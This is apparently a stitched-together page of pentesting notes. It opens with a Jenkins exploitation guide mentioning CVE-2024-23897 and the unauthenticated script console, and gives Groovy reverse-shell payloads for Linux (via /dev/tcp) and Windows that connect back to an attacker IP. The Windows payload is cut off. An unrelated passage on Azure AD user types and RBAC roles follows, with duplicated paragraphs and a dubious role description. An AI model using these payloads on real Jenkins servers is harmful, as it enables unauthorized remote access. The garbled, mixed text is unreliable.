Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
Azure Active Directory has two types of Users.
1) Member
A member is a normal cloud user. An Active Directory member can read all directory information and can invite external users. They can also manage their own profile information and can register applications in the AD.
2) Guest
1) Member
A member is a normal cloud user. An Active Directory member can read all directory information and can invite external users. They can also manage their own profile information and can register applications in the AD.
2) Guest
Restricted user who can manage only their own profile data. Cannot browse the directory and cannot register applications in the AD.
RBAC built-in roles (Top 4)
- Owner Role : Lets you manage everything, including access to resources.The owner can add permission, perform actions such as delete, stop the resources.
- Contributor Role : This role allows a user to manage all types of resources, but does not allow the user to grant access to resources.To allow a user to have the ability to grant access to resources, the user must be assigned with either the User Access Administrator Role or the Owner Role
- User Access Administrator Role : In this role, the user can manage the access to resources. The user would be able to read all resources, but can't modify.
- Virtual Machine Contributor Role : This allows to manage the properties of the Virtual Machine. This will not provide access to the underlying virtual network or the storage accounts the virtual machine is connected to.